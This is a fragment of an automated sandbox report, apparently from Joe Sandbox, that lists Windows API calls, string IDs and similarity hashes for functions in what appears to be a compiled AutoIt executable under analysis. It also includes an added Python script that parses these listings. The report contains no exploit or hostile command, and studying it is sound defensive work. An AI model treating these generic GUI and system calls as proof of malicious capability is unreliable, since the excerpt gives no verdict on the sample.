                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 398feb0d9a23432a5d2d423488dff9656fdee1fedfcb3fee89f533cab041beb3
                                                                  • Instruction ID: a8de3b97b0e43bbdf4b7671c5bd84f42de4b65d2809eb6cad3ba7bb445e7865a
                                                                  • Opcode Fuzzy Hash: 398feb0d9a23432a5d2d423488dff9656fdee1fedfcb3fee89f533cab041beb3
                                                                  • Instruction Fuzzy Hash: 0E029E72914119EFDB14DFA8CD99EAEBBB9FF48314F008158F919AB2A1C7309D41DB60
APIs
• CharUpperBuffW.USER32(?,?,0097F910), ref: 00973627
• IsWindowVisible.USER32(?), ref: 0097364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
• Opcode ID: e7ed170ddb929ff7955cb21726121c63f901517e0c8847cd1967fe8fca4b1e4b
• Instruction ID: 571e59723d9020b753023dff06dbba5c4218ff59f7107e2d4867d9f427f9480f
• Opcode Fuzzy Hash: e7ed170ddb929ff7955cb21726121c63f901517e0c8847cd1967fe8fca4b1e4b
• Instruction Fuzzy Hash: 3BD192312143059BCB14EF14C556FAE7BE5BF85344F14C858F8899B2A2DB31DE49DB82
APIs
• SetTextColor.GDI32(?,00000000), ref: 0097A630
• GetSysColorBrush.USER32(0000000F), ref: 0097A661
• GetSysColor.USER32(0000000F), ref: 0097A66D
• SetBkColor.GDI32(?,000000FF), ref: 0097A687
• SelectObject.GDI32(?,00000000), ref: 0097A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 0097A6C1
• GetSysColor.USER32(00000010), ref: 0097A6C9
• CreateSolidBrush.GDI32(00000000), ref: 0097A6D0
• FrameRect.USER32(?,?,00000000), ref: 0097A6DF
• DeleteObject.GDI32(00000000), ref: 0097A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 0097A731
• FillRect.USER32(?,?,00000000), ref: 0097A763
• GetWindowLongW.USER32(?,000000F0), ref: 0097A78E
  • Part of subcall function 0097A8CA: GetSysColor.USER32(00000012), ref: 0097A903
  • Part of subcall function 0097A8CA: SetTextColor.GDI32(?,?), ref: 0097A907
  • Part of subcall function 0097A8CA: GetSysColorBrush.USER32(0000000F), ref: 0097A91D
  • Part of subcall function 0097A8CA: GetSysColor.USER32(0000000F), ref: 0097A928
  • Part of subcall function 0097A8CA: GetSysColor.USER32(00000011), ref: 0097A945
  • Part of subcall function 0097A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0097A953
  • Part of subcall function 0097A8CA: SelectObject.GDI32(?,00000000), ref: 0097A964
  • Part of subcall function 0097A8CA: SetBkColor.GDI32(?,00000000), ref: 0097A96D
  • Part of subcall function 0097A8CA: SelectObject.GDI32(?,?), ref: 0097A97A
  • Part of subcall function 0097A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0097A999
  • Part of subcall function 0097A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0097A9B0
  • Part of subcall function 0097A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0097A9C5
  • Part of subcall function 0097A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097A9ED
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: 6f3492c7f9587d1155718fb111ff1f55eb93ea5550c986f27508cb5fda62bf39
• Instruction ID: dea9642f95ee66712e0917fec345b256a1dfad803d21915f1e1d84d92a7f2e28
• Opcode Fuzzy Hash: 6f3492c7f9587d1155718fb111ff1f55eb93ea5550c986f27508cb5fda62bf39
• Instruction Fuzzy Hash: B1917B7351C301EFCB109F64DC08A6F7BA9FF89321F104A29F96AA61A0D771D984DB52
APIs
• DestroyWindow.USER32(?,?,?), ref: 008F2CA2
• DeleteObject.GDI32(00000000), ref: 008F2CE8
• DeleteObject.GDI32(00000000), ref: 008F2CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 008F2CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 008F2D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0092C43B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0092C474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0092C89D
  • Part of subcall function 008F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F2036,?,00000000,?,?,?,?,008F16CB,00000000,?), ref: 008F1B9A
• SendMessageW.USER32(?,00001053), ref: 0092C8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0092C8F1
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0092C907
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0092C912
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
• Opcode ID: eca00998de809d0513379d344a73e2c34b0a07151ff1dc063a715257489e1a2f
• Instruction ID: adce11b5ab8f8a5d86915e311404c0bf83eba370dc731552fd7414d6803f1f36
• Opcode Fuzzy Hash: eca00998de809d0513379d344a73e2c34b0a07151ff1dc063a715257489e1a2f
• Instruction Fuzzy Hash: 8D129B70204216AFDB20CF24D894BBDBBA9FF44304F548569F989DB266C731E882DF91
APIs
• DestroyWindow.USER32(00000000), ref: 009674DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0096759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009675DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009675ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00967633
• GetClientRect.USER32(00000000,?), ref: 0096763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00967683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00967692
• GetStockObject.GDI32(00000011), ref: 009676A2
• SelectObject.GDI32(00000000,00000000), ref: 009676A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009676B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 009676BF
• DeleteDC.GDI32(00000000), ref: 009676C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009676F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0096770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00967746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0096775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0096776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0096779B
• GetStockObject.GDI32(00000011), ref: 009677A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009677B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009677BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: decf318045f6001772f5d97468999bb20692d06a149375da5c3805d4aef7a40f
• Instruction ID: 4f6a397cc1cb3f4902b828d953963748855c2a735e29aaf070968370070c641a
• Opcode Fuzzy Hash: decf318045f6001772f5d97468999bb20692d06a149375da5c3805d4aef7a40f
• Instruction Fuzzy Hash: 1EA17171A14619BFEB14DBA8DD4AFAEBB79EB04714F004214FA19E72E0C770AD40DB60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0095AD1E
• GetDriveTypeW.KERNEL32(?,0097FAC0,?,\\.\,0097F910), ref: 0095ADFB
• SetErrorMode.KERNEL32(00000000,0097FAC0,?,\\.\,0097F910), ref: 0095AF59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: a82166d5a39cae8730730fbc75fd5ee0cc94d56de467b8f458e7548c8d90af83
• Instruction ID: 9da85f1d1b69866a48ae5ab6056d8bccccd6e0f3408dcd058c15b0d4f2e1b327
• Opcode Fuzzy Hash: a82166d5a39cae8730730fbc75fd5ee0cc94d56de467b8f458e7548c8d90af83
• Instruction Fuzzy Hash: AE51D9B06481099B8B00EB26CD52D7E73B4FF897067604656FC07E7190DA349D09DBA7
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: 59c8f9f2e06c2ba6728f6d36b4f119c2a2ab27d31416c1ba3be09c2d8445b1e3
• Instruction ID: 858c599ee43563c087bc631728038c9f021590c2426e3fba58ef4be4870c4ec0
• Opcode Fuzzy Hash: 59c8f9f2e06c2ba6728f6d36b4f119c2a2ab27d31416c1ba3be09c2d8445b1e3
• Instruction Fuzzy Hash: 2281067170021E6ADB10AB74EC82FBA3768FF55714F044125FA05EA1D6FBA0DE61D2A1
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00979AD2
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00979B8B
• SendMessageW.USER32(?,00001102,00000002,?), ref: 00979BA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
• Opcode ID: 89dece91c7f7a48639849785ac066cf3f73f7d7afde3ae52f63faf51a368775a
• Instruction ID: 3b12530c41a42c671b815739f85e9484f9e3ae15899d8ebed042090a955f03e8
• Opcode Fuzzy Hash: 89dece91c7f7a48639849785ac066cf3f73f7d7afde3ae52f63faf51a368775a
• Instruction Fuzzy Hash: FC02CF72108301AFDB25CF24C859BAABBE9FF89314F04892DF99DD62A1C734D844DB52
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 0097A903
                                                                  • SetTextColor.GDI32(?,?), ref: 0097A907
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0097A91D
                                                                  • GetSysColor.USER32(0000000F), ref: 0097A928
                                                                  • CreateSolidBrush.GDI32(?), ref: 0097A92D
                                                                  • GetSysColor.USER32(00000011), ref: 0097A945
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0097A953
                                                                  • SelectObject.GDI32(?,00000000), ref: 0097A964
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0097A96D
                                                                  • SelectObject.GDI32(?,?), ref: 0097A97A
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0097A999
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0097A9B0
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0097A9C5
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097A9ED
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0097AA14
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0097AA32
                                                                  • DrawFocusRect.USER32(?,?), ref: 0097AA3D
                                                                  • GetSysColor.USER32(00000011), ref: 0097AA4B
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0097AA53
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0097AA67
                                                                  • SelectObject.GDI32(?,0097A5FA), ref: 0097AA7E
                                                                  • DeleteObject.GDI32(?), ref: 0097AA89
                                                                  • SelectObject.GDI32(?,?), ref: 0097AA8F
                                                                  • DeleteObject.GDI32(?), ref: 0097AA94
                                                                  • SetTextColor.GDI32(?,?), ref: 0097AA9A
                                                                  • SetBkColor.GDI32(?,?), ref: 0097AAA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 05e8ef7c45157c0c92cc211d209575659fc46df42cb0808b6963047087a0153f
                                                                  • Instruction ID: b9b1847ca04021583ec65a9544b06fbd1dfac9c7b706a03bbb55ec650f94c4a4
                                                                  • Opcode Fuzzy Hash: 05e8ef7c45157c0c92cc211d209575659fc46df42cb0808b6963047087a0153f
                                                                  • Instruction Fuzzy Hash: 9A512C72914208EFDF109FA4DC48EAE7B79FF48320F118525F919BB2A1D6759980DB50
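Every function entry in these listings has the same shape: an `APIs` header, one bullet per call written as `Name.MODULE(args), ref: ADDR` (CRT entries such as `_memset.LIBCMT` carry no argument list, and calls reached through a callee are prefixed `Part of subcall function ADDR:`), an optional `Strings` header, the memory-dump metadata, and the `Similarity` fields, where `String ID` appears to join the function's string literals with `$`. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses an excerpt of such lines (constructed here from entries in this section) into records so that questions like "which functions call GetAsyncKeyState" or "how many calls per exporting module" can be answered without scrolling. The line shapes it relies on are those observed in this report; treating them as a stable export format is an assumption, not a documented schema.

```python
"""Parse Joe Sandbox per-function API listings into structured records.

Added example, not part of the Joe Sandbox report or its IDA plugin. The line
shapes handled here are the ones observed in this report; treating them as a
fixed export format is an assumption.
"""
import re
from collections import Counter

# One call line, e.g. "• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00978AC1".
# Optional "Part of subcall function ADDR:" prefix; optional "(args)" (absent for
# CRT entries such as "_memset.LIBCMT ref: 00978C44").
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_report(text):
    """Return a list of function blocks; a new block starts at each 'APIs' header."""
    blocks = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "strings": [], "api_id": "", "opcode_id": ""}
            blocks.append(cur)
            continue
        if cur is None:
            continue                      # text before the first block
        m = CALL_RE.match(raw)
        if m:
            args = m.group("args")
            cur["calls"].append({
                "name": m.group("name"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"),
                "subcall": m.group("sub"),  # callee address when reached indirectly
            })
        elif line.startswith("• String ID:"):
            # Literals are joined with '$'; an empty field means no strings.
            value = line.split(":", 1)[1].strip()
            cur["strings"] = [s for s in value.split("$") if s]
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("• Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
    return blocks


def blocks_calling(blocks, api_name):
    """Indices of blocks that call api_name directly or through a subcall."""
    return [i for i, b in enumerate(blocks)
            if any(c["name"] == api_name for c in b["calls"])]


def module_histogram(blocks):
    """Count calls per exporting module across all blocks."""
    return Counter(c["module"] for b in blocks for c in b["calls"])


def summarize(blocks):
    """One line per block: call count, distinct API names and string literals."""
    return [f"block {i}: {len(b['calls'])} calls, apis={sorted({c['name'] for c in b['calls']})}, "
            f"strings={b['strings']}" for i, b in enumerate(blocks)]


# Constructed excerpt assembled from entries in this report section.
SAMPLE = r"""
APIs
• GetCursorPos.USER32(?), ref: 009749CA
• GetDesktopWindow.USER32 ref: 009749DF
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00974A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00974ABB
  • Part of subcall function 008F2344: GetAsyncKeyState.USER32(00000001), ref: 008F2399
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• Opcode ID: 0574aa510f4af71d79693ac76ca91a117a239278486f974f4b9b47b86722447c
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 009544AC
• _wcscpy.LIBCMT ref: 00954500
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00954548
Strings
Similarity
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• Opcode ID: cba1e78b0c1228377a91d4bc06ac1978b0ba3151ceb91a5594346d27b18137a4
"""

if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    print("\n".join(summarize(parsed)))
    print("GetAsyncKeyState in blocks:", blocks_calling(parsed, "GetAsyncKeyState"))
    print("calls per module:", dict(module_histogram(parsed)))
```

To run it over a whole report, save the page as text and pass the file contents to `parse_report`; the subcall prefix is kept as a separate field so that APIs attributed to a callee are not mistaken for direct imports of the function being examined.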
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00978AC1
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00978AD2
                                                                  • CharNextW.USER32(0000014E), ref: 00978B01
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00978B42
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00978B58
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00978B69
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00978B86
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00978BD8
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00978BEE
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00978C1F
                                                                  • _memset.LIBCMT ref: 00978C44
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00978C8D
                                                                  • _memset.LIBCMT ref: 00978CEC
                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00978D16
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00978D6E
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00978E1B
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00978E3D
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00978E87
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00978EB4
                                                                  • DrawMenuBar.USER32(?), ref: 00978EC3
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00978EEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: c60b2ec82026cc971b46df04e3fabe437cb5d8f5ae99d7b1a2be1a023a909dfe
                                                                  • Instruction ID: ab27afe60d9ffe5ae8977deb65d444944d46a34143da9d2e8a9ba8fb1a164fae
                                                                  • Opcode Fuzzy Hash: c60b2ec82026cc971b46df04e3fabe437cb5d8f5ae99d7b1a2be1a023a909dfe
                                                                  • Instruction Fuzzy Hash: C9E16E72944218AFDB219F60CC88EEF7BB9FF49720F108156F91DAA190DB748980DF60
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 009749CA
                                                                  • GetDesktopWindow.USER32 ref: 009749DF
                                                                  • GetWindowRect.USER32(00000000), ref: 009749E6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00974A48
                                                                  • DestroyWindow.USER32(?), ref: 00974A74
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00974A9D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00974ABB
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00974AE1
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00974AF6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00974B09
                                                                  • IsWindowVisible.USER32(?), ref: 00974B29
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00974B44
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00974B58
                                                                  • GetWindowRect.USER32(?,?), ref: 00974B70
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00974B96
                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00974BB0
                                                                  • CopyRect.USER32(?,?), ref: 00974BC7
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00974C32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
